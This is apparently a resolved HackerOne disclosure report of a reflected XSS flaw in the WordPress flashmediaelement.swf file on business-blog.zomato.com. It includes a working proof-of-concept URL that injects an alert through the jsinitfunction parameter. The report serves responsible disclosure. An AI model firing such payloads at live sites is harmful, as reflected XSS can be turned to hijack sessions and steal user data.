XSS in flashmediaelement.swf (business-blog.zomato.com)
Medium
Vulnerability Details
Hello __Team__
__Description__:-
business-blog.zomato.com is vulnerable to reflected XSS that stems from an insecure URL sanitization process performed in the file flashmediaelement.swf
__POC__:-
https://business-blog.zomato.com/wp-includes/js/mediaelement/flashmediaelement.swf?%#jsinitfunctio%gn=alert%60xss by dem0n%60
{F154224}
__Fix__:-
Update to WordPress to latest
__Regards__:-
Santhosh
Actions
View on HackerOneReport Stats
- Report ID: 200351
- State: Closed
- Substate: resolved
- Upvotes: 4